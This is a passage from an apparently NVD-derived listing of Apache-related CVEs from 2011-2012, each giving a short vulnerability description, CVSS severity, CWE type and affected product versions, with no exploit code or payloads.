apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-5064 MEDIUM

DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2012-0021 LOW

The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.2.21
apache http_server 2.2.20
apache http_server 2.2.17
apache http_server 2.2.18
apache http_server 2.2.19
CVE-2012-0022 MEDIUM

Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2012-0031 MEDIUM

scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_web_server 1.0.0
debian debian_linux 6.0
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
suse linux_enterprise_server 10
debian debian_linux 5.0
opensuse opensuse 11.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_server_aus 6.2
redhat enterprise_linux_workstation 6.0
redhat storage 2.0
redhat enterprise_linux_eus 6.2
suse linux_enterprise_software_development_kit 10
CVE-2012-0037 MEDIUM

Redland Raptor (aka libraptor) before 2.0.7, as used by OpenOffice 3.3 and 3.4 Beta, LibreOffice before 3.4.6 and 3.5.x before 3.5.1, and other products, allows user-assisted remote attackers to read arbitrary files via a crafted XML external entity (XXE) declaration and reference in an RDF document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
libreoffice libreoffice 3.3.4
libreoffice libreoffice 3.4.1
apache openoffice.org 3.4
redland libraptor *
libreoffice libreoffice 3.4.0
fedoraproject fedora 17
fedoraproject fedora 16
redhat enterprise_linux_server 6.0
libreoffice libreoffice 3.5.0
redhat storage 2.0
redhat storage_for_public_cloud 2.0
redhat enterprise_linux_eus 6.2
libreoffice libreoffice 3.3.1
libreoffice libreoffice 3.3.3
apache openoffice 3.4.0
redhat enterprise_linux_desktop 5.0
apache openoffice.org 3.3
debian debian_linux 6.0
libreoffice libreoffice 3.3.0
librdf raptor *
libreoffice libreoffice 3.5
apache openoffice 3.3.0
redhat enterprise_linux_desktop 6.0
redhat gluster_storage_server_for_on-premise 2.0
libreoffice libreoffice 3.4.5
libreoffice libreoffice 3.4.2
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_server_aus 6.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 5.0
libreoffice libreoffice 3.3.2
libreoffice libreoffice *
CVE-2012-0047 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket 1.4.10
apache wicket 1.4.2
apache wicket 1.4.18
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 1.4.12
apache wicket 1.4.0
apache wicket 1.4.8
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.17
apache wicket 1.4.4
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 1.4.7
apache wicket 1.4.19
CVE-2012-0053 MEDIUM

protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_web_server 1.0.0
debian debian_linux 6.0
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
suse linux_enterprise_server 10
debian debian_linux 5.0
opensuse opensuse 11.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
redhat storage 2.0
redhat enterprise_linux_eus 6.2
suse linux_enterprise_software_development_kit 10
CVE-2012-0256 MEDIUM

Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache traffic_server 2.1.1
apache traffic_server 2.1.2
apache traffic_server 3.0.1
apache traffic_server 2.0.1
apache traffic_server 2.1.7
apache traffic_server 2.1.8
apache traffic_server 3.0.3
apache traffic_server 3.0.0
apache traffic_server 3.1.1
apache traffic_server 2.1.6
apache traffic_server 3.1.0
apache traffic_server 2.0.0
apache traffic_server 2.1.5
apache traffic_server 3.0.2
apache traffic_server 2.1.3
apache traffic_server 2.1.4
apache traffic_server 2.1.0
apache traffic_server 2.1.9
apache traffic_server 3.1.2
CVE-2012-0391 HIGH

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0392 MEDIUM

The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0393 MEDIUM

The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0394 MEDIUM

The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0803 HIGH

The WS-SP UsernameToken policy in Apache CXF 2.4.5 and 2.5.1 allows remote attackers to bypass authentication by sending an empty UsernameToken as part of a SOAP request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf 2.4.5
apache cxf 2.5.1
CVE-2012-0838 HIGH

Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0840 MEDIUM

tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache portable_runtime 1.3.6
apache portable_runtime 0.9.2-dev
apache portable_runtime 0.9.2
apache portable_runtime 0.9.1
apache portable_runtime 1.3.13
apache portable_runtime 1.3.7
apache portable_runtime 1.3.9
apache portable_runtime 0.9.5
apache portable_runtime 0.9.7
apache portable_runtime 0.9.9
apache portable_runtime 1.3.5
apache portable_runtime *
apache portable_runtime 0.9.3
apache portable_runtime 1.3.10
apache portable_runtime 1.3.12
apache portable_runtime 1.3.3
apache portable_runtime 1.4.0
apache portable_runtime 1.3.4-dev
apache portable_runtime 0.9.7-dev
apache portable_runtime 0.9.3-dev
apache portable_runtime 1.3.11
apache portable_runtime 1.3.1
apache portable_runtime 1.3.0
apache portable_runtime 0.9.4
apache portable_runtime 1.3.2
apache portable_runtime 1.4.4
apache portable_runtime 0.9.6
apache portable_runtime 1.3.6-dev
apache portable_runtime 1.3.8
apache portable_runtime 0.9.8
apache portable_runtime 1.4.2
apache portable_runtime 1.3.4
apache portable_runtime 1.4.3
apache portable_runtime 0.9.16-dev
apache portable_runtime 1.4.1
CVE-2012-0880 HIGH

Apache Xerces-C++ allows remote attackers to cause a denial of service (CPU consumption) via a crafted message sent to an XML service that causes hash table collisions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache xerces-c++ -
CVE-2012-0881 HIGH

Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache xerces2_java *
CVE-2012-0883 MEDIUM

envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
apache http_server 2.4.1
opensuse opensuse 11.4
opensuse opensuse 12.1
CVE-2012-1006 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.14
apache struts 2.2.3
CVE-2012-1007 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 1.3.10
CVE-2012-1089 MEDIUM

Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache wicket 1.4.2
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 1.4.12
apache wicket 1.4.0
apache wicket 1.5.4
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.4
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 1.5.1
apache wicket 1.4.10
apache wicket 1.4.18
apache wicket 1.5.2
apache wicket 1.5.3
apache wicket 1.4.8
apache wicket 1.4.17
apache wicket 1.5.0
apache wicket 1.4.7
apache wicket 1.4.19
CVE-2012-1149 HIGH

Integer overflow in the vclmi.dll module in OpenOffice.org (OOo) 3.3, 3.4 Beta, and possibly earlier, and LibreOffice before 3.5.3, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted embedded image object, as demonstrated by a JPEG image in a .DOC file, which triggers a heap-based buffer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189,

Products Affected

Vendor Product Version
redhat enterprise_linux_desktop 5.0
debian debian_linux 6.0
debian debian_linux 7.0
apache openoffice.org 3.4
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_eus 6.2.z
fedoraproject fedora 16
redhat enterprise_linux 5.0
apache openoffice.org 3.3.0
redhat enterprise_linux_server 6.0
redhat enterprise_linux_server_aus 6.2
redhat enterprise_linux_workstation 6.0
fedoraproject fedora 15
libreoffice libreoffice *
CVE-2012-1181 MEDIUM

fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache mod_fcgid 2.3.6
CVE-2012-1574 MEDIUM

The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache hadoop 0.20.204.0
cloudera cloudera_cdh cdh3
apache hadoop 0.20.205.0
apache hadoop 0.23.0
apache hadoop 1.0.1
apache hadoop 0.20.203.0
cloudera hadoop 0.20-sbin
apache hadoop 0.23.1
cloudera hadoop 0.20.2+923
apache hadoop 1.0.0
cloudera hadoop 0.20.1+169
CVE-2012-1592 MEDIUM

A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,

Products Affected

Vendor Product Version
apache struts 2.0.0
CVE-2012-1621 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.02 allow remote attackers to inject arbitrary web script or HTML via (1) a parameter array in freemarker templates, the (2) contentId or (3) mapKey parameter in a cms event request, which are not properly handled in an error message, or unspecified input in (4) an ajax request to the getServerError function in checkoutProcess.js or (5) a Webslinger component request. NOTE: some of these details are obtained from third party information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
CVE-2012-1622 HIGH

Apache OFBiz 10.04.x before 10.04.02 allows remote attackers to execute arbitrary code via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ofbiz 10.04
CVE-2012-2098 MEDIUM

Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2012-2138 MEDIUM

The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache org.apache.sling.servlets.post *
CVE-2012-2149 HIGH

The WPXContentListener::_closeTableRow function in WPXContentListener.cpp in libwpd 0.8.8, as used by OpenOffice.org (OOo) before 3.4, allows remote attackers to execute arbitrary code via a crafted Wordperfect .WPD document that causes a negative array index to be used. NOTE: some sources report this issue as an integer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189,

Products Affected

Vendor Product Version
redhat enterprise_linux_desktop 5.0
apache openoffice.org 3.3
apache openoffice.org *
redhat enterprise_linux__optional_productivity_applications *
libwpd libwpd 0.8.8
CVE-2012-2334 MEDIUM

Integer overflow in filter/source/msfilter/msdffimp.cxx in OpenOffice.org (OOo) 3.3, 3.4 Beta, and possibly earlier, and LibreOffice before 3.5.3, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the length of an Escher graphics record in a PowerPoint (.ppt) document, which triggers a buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
libreoffice libreoffice 3.3.3
libreoffice libreoffice 3.3.4
apache openoffice.org 3.3
libreoffice libreoffice 3.3.0
libreoffice libreoffice 3.4.1
libreoffice libreoffice 3.5
apache openoffice.org 3.4
libreoffice libreoffice 3.4.0
libreoffice libreoffice 3.4.5
libreoffice libreoffice 3.4.2
libreoffice libreoffice 3.3.2
libreoffice libreoffice *
libreoffice libreoffice 3.3.1
CVE-2012-2378 MEDIUM

Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1 does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cxf 2.4.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.0
apache cxf 2.5.1
apache cxf 2.5.2
apache cxf 2.4.6
CVE-2012-2379 HIGH

Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cxf 2.4.4
apache cxf 2.4.5
apache cxf 2.6.0
apache cxf 2.5.0
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.5.1
apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.4.2
apache cxf 2.4.6
CVE-2012-2380 MEDIUM

Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache roller 2.0
apache roller 0.9.6.4
apache roller 2.3
apache roller 1.2
apache roller 0.9.8.1
apache roller 1.0
apache roller 2.0.1
apache roller 4.0
apache roller 2.0.2
apache roller 2.1.1
apache roller 0.9.7.1
apache roller *
apache roller 0.9.6
apache roller 1.0.1
apache roller 0.9.7.2
apache roller 0.9.9
apache roller 0.9.6.3
apache roller 3.1
apache roller 4.0.1
apache roller 0.9.5
apache roller 1.1.1
apache roller 0.9.8.2
apache roller 0.9.7
apache roller 3.0
apache roller 1.3
apache roller 2.1
apache roller 1.1.2
apache roller 1.1
apache roller 0.9.8
CVE-2012-2381 LOW

Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache roller 2.0
apache roller 0.9.6.4
apache roller 2.3
apache roller 1.2
apache roller 0.9.8.1
apache roller 1.0
apache roller 2.0.1
apache roller 4.0
apache roller 2.0.2
apache roller 2.1.1
apache roller 0.9.7.1
apache roller *
apache roller 0.9.6
apache roller 1.0.1
apache roller 0.9.7.2
apache roller 0.9.9
apache roller 0.9.6.3
apache roller 3.1
apache roller 4.0.1
apache roller 0.9.5
apache roller 1.1.1
apache roller 0.9.8.2
apache roller 0.9.7
apache roller 3.0
apache roller 1.3
apache roller 2.1
apache roller 1.1.2
apache roller 1.1
apache roller 0.9.8
CVE-2012-2665 HIGH

Multiple heap-based buffer overflows in the XML manifest encryption tag parsing functionality in OpenOffice.org and LibreOffice before 3.5.5 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted Open Document Text (.odt) file with (1) a child tag within an incorrect parent tag, (2) duplicate tags, or (3) a Base64 ChecksumAttribute whose length is not evenly divisible by four.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 11.10
redhat enterprise_linux_server_from_rhui_6 6.0
redhat enterprise_linux_for_power_big_endian 6.0
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux 6.0
redhat enterprise_linux_for_ibm_z_systems 6.0
canonical ubuntu_linux 12.04
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
canonical ubuntu_linux 11.04
libreoffice libreoffice *
CVE-2012-2687 LOW

Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.2.17
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.2.2
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.1
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.12
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.4.0
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.8
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
CVE-2012-3353 MEDIUM

The Apache Sling JCR ContentLoader 2.1.4 XmlReader used in the Sling JCR content loader module makes it possible to import arbitrary files in the content repository, including local files, causing potential information leaks. Users should upgrade to version 2.1.6 of the JCR ContentLoader.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache sling_jcr_contentloader 2.1.4
CVE-2012-3376 HIGH

DataNodes in Apache Hadoop 2.0.0 alpha do not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache hadoop 2.0.0
CVE-2012-3446 MEDIUM

Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache libcloud *
CVE-2012-3451 MEDIUM

Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf *
CVE-2012-3499 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.2.17
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.4.3
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.1
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.12
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.4.0
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.8
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
CVE-2012-3502 MEDIUM

